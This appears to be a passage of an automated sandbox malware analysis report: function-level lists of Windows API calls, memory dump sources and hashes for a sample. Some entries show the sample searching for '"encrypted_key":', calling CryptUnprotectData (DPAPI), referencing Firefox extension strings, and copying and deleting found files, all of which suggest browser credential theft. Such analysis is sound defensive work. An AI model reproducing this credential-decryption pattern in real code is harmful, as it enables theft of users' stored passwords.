  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
  • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
• StrStrA.SHLWAPI(00000000,?,0101656C,010158CE), ref: 00FED653
• lstrlenA.KERNEL32(?), ref: 00FED666
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
• String ID: ^userContextId=4294967295$moz-extension+++
• API String ID: 161838763-3310892237
• Opcode ID: cf9053e6b571e5468a18630d01a10e2d0702e7dfb669108a1b8ce39785f1210f
• Instruction ID: 16aa5e1e796fd27d3ab7a99a9f152d5e1f7ddc4d49932c37e507249e74c9ce7c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41C93290015D9BCF50FBA6DD429DD77B4AF04300F420561FE44B7227EAA9BE09ABD1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00FFB847
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FFB85B
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FFB8A8
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00FFA8ED,?,00000001,?,?,?), ref: 00FFB8C7
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 803809635-0
                                                                                                                                                                                                                                                          • Opcode ID: d280c6cf271d25060523b50f4a8100c1cc565ee31679610683562c24361fa0eb
                                                                                                                                                                                                                                                          • Instruction ID: f84e8e9bb39829a0703695c7a1ee737757faaab935820a9da098530ad69fb8b0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d280c6cf271d25060523b50f4a8100c1cc565ee31679610683562c24361fa0eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56319E72A00708AFD721CF65C980AA6B7FCFF88750F44852EEA8687A10DB70F905DB50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF26A9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F84: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FF26D3,?), ref: 00FF1F8F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F84: HeapAlloc.KERNEL32(00000000), ref: 00FF1F96
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F84: wsprintfW.USER32 ref: 00FF1FA7
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00FF274F
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FF275D
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF2764
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2224742867-0
                                                                                                                                                                                                                                                          • Opcode ID: 105fdb600345f38635ca51b725dd8887c2eb5e4870ed4c85209326b81466581c
                                                                                                                                                                                                                                                          • Instruction ID: cba5009fe166d5feb5fd5f56c4604b3aa6a482f2d514db0cd082f2a11fea9d6b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 105fdb600345f38635ca51b725dd8887c2eb5e4870ed4c85209326b81466581c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD31FC72A0121CAFDB21AFA4DC889EEB7BDEF0A354F0440A6F605A2550D6359F849F52
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6CD682D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CD6A340,?,00000000,-00000008), ref: 6CD68332
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD66F81
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6CD66F88
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 6CD66FC2
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6CD66FC9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 52e87603caadc411b46a38f623849a14991c739965c665add0b80be6e5622cd0
• Instruction ID: c0fb37f3a763425eb9f77baf946fb4fb3b62700dacef46a400055dabc03577a7
• Instruction Fuzzy Hash: 01217171614219AFDB109F67C89089EB7E9EF45368F048619F914D7E60D731EC16CB60
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
  • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
• StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8833
  • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86AE
  • Part of subcall function 00FE8696: LocalAlloc.KERNEL32(00000040,?,?,?,00FE6716,?), ref: 00FE86BC
  • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86D2
  • Part of subcall function 00FE8696: LocalFree.KERNEL32(?,?,?,00FE6716,?), ref: 00FE86E1
  • Part of subcall function 00FE86EF: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00FE8889), ref: 00FE8712
  • Part of subcall function 00FE86EF: LocalAlloc.KERNEL32(00000040,00FE8889,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8726
  • Part of subcall function 00FE86EF: LocalFree.KERNEL32(00FECD1F,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE874B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
• String ID: $"encrypted_key":"$DPAPI
• API String ID: 2311102621-738592651
• Opcode ID: e0d4bb6ee4a939be98c8e37da71e0e1f37afcb60d503d8b28f0acbde15e8546a
• Instruction ID: 748f441cbb000252a4a148fbe942ad99b3ede3d8b77052bc5a9a4565aed6c3ac
• Instruction Fuzzy Hash: 9F218E32E00249ABDF14FAA6DC81ADE7774AF003A0F5445A9ED14B72D1DF74AF06DA90
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 6CD6837C
  • Part of subcall function 6CD682D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CD6A340,?,00000000,-00000008), ref: 6CD68332
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CD683B4
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CD683D4
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: 2ce9bec80032c1b35506a1f9787d99dd6b58b35431d068f32846cc0e54fec434
• Instruction ID: 2fb03e1aaaf9fd442ebf21f502b08df29629ea09839f0324bf547d740caba67e
• Instruction Fuzzy Hash: D911C4B1A01629BF670117779C8CCAFBA6DEE4B29DB00012AF904D2E10FB70DD15D270
APIs
  • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
• lstrcatA.KERNEL32(?,00000000), ref: 00FF6884
• lstrcatA.KERNEL32(?,01015B34), ref: 00FF68A1
• lstrcatA.KERNEL32(?), ref: 00FF68B4
• lstrcatA.KERNEL32(?,01015B38), ref: 00FF68C6
  • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF61F5
  • Part of subcall function 00FF61AE: FindFirstFileA.KERNEL32(?,?), ref: 00FF620C
  • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015A9C), ref: 00FF622D
  • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015AA0), ref: 00FF6247
  • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF626E
  • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,0101565D), ref: 00FF6282
  • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF629F
  • Part of subcall function 00FF61AE: PathMatchSpecA.SHLWAPI(?,?), ref: 00FF62CC
  • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?), ref: 00FF6302
  • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015AB8), ref: 00FF6314
  • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF6327
  • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015ABC), ref: 00FF6339
  • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF634D
  • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF62B6
  • Part of subcall function 00FF61AE: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF6406
  • Part of subcall function 00FF61AE: DeleteFileA.KERNEL32(?), ref: 00FF647A
  • Part of subcall function 00FF61AE: FindNextFileA.KERNEL32(?,?), ref: 00FF64DC
  • Part of subcall function 00FF61AE: FindClose.KERNEL32(?), ref: 00FF64F0
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                                                                                          • Opcode ID: f2f6d255115a1a3da77332a709a9e3dc338c4c6a3347b990a88adf085a1b6bb2
                                                                                                                                                                                                                                                          • Instruction ID: 29ff1fc63faed1987baecc78e920f58e6abd7dbe7fe8e0feaf8a35eb5befd3c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f6d255115a1a3da77332a709a9e3dc338c4c6a3347b990a88adf085a1b6bb2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521AE32A0011CAFDB60EB65EC4AAD977B9FF19300F4044A5B788E7255DE799AC49F80
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,010155C7,?,?,?), ref: 00FF0EFB
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF0F02
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00FF0F0E
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF0F39
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocLocalProcessTimewsprintf
• String ID:
• API String ID: 1243822799-0
• Opcode ID: 645985c93a169d668c632bddf07ad9b58930e08467042fbc5c908187aeb7cc8a
• Instruction ID: 3d276ce8997a27e1305c0922566553cfc7630867cea733e81fe7683fcec67dc2
• Opcode Fuzzy Hash: 645985c93a169d668c632bddf07ad9b58930e08467042fbc5c908187aeb7cc8a
• Instruction Fuzzy Hash: 36F0ECB5900129BFDB60ABE9A909ABF77FCAF0C611F404055FB41E2184E63D9A40D7B5
APIs
• CreateFileA.KERNEL32(00FF5189,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00FF5189,?), ref: 00FF23A4
• GetFileSizeEx.KERNEL32(00000000,00FF5189,?,?,?,00FF5189,?), ref: 00FF23BC
• CloseHandle.KERNEL32(00000000,?,?,?,00FF5189,?), ref: 00FF23C7
• CloseHandle.KERNEL32(00000000,?,?,?,00FF5189,?), ref: 00FF23CF
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4148174661-0
                                                                                                                                                                                                                                                          • Opcode ID: f66cf1a8dba244477cc9e9fb401b0c0f1507817e28e0f932b00036b51f305c60
                                                                                                                                                                                                                                                          • Instruction ID: bce7113e2943e79ee6d71ab0c94ae13cefbacbe7ebd31df127ce13ed47dc7c8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f66cf1a8dba244477cc9e9fb401b0c0f1507817e28e0f932b00036b51f305c60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F08271640118FFE7609AA0EC0DFAA3A6DEF44760F108110FB41A21D4E7B0AE00ABA4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000), ref: 6CD6C23D
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000,?,?,?,6CD6B23A,00000000), ref: 6CD6C249
                                                                                                                                                                                                                                                            • Part of subcall function 6CD6C20F: CloseHandle.KERNEL32(FFFFFFFE,6CD6C259,?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000,?,?), ref: 6CD6C21F
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6CD6C259
                                                                                                                                                                                                                                                            • Part of subcall function 6CD6C1D1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CD6C200,6CD6B9C6,?,?,6CD6AC94,?,00000000,00000000,?), ref: 6CD6C1E4
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000,?), ref: 6CD6C26E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: 29e5b28ab382dd1c7d62d125d87c6f44938841ce834b9bc508a7124fba46f3ff
                                                                                                                                                                                                                                                          • Instruction ID: 30b9e75d5b161829ec5ff8e7317056161a02068674de2da29c8411ca4ce1f4c8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e5b28ab382dd1c7d62d125d87c6f44938841ce834b9bc508a7124fba46f3ff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2F0F836640164BBDF222FD68C489CA3E7AEB4A2A1F054610FF1985920C732C920EBA5
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FE5270
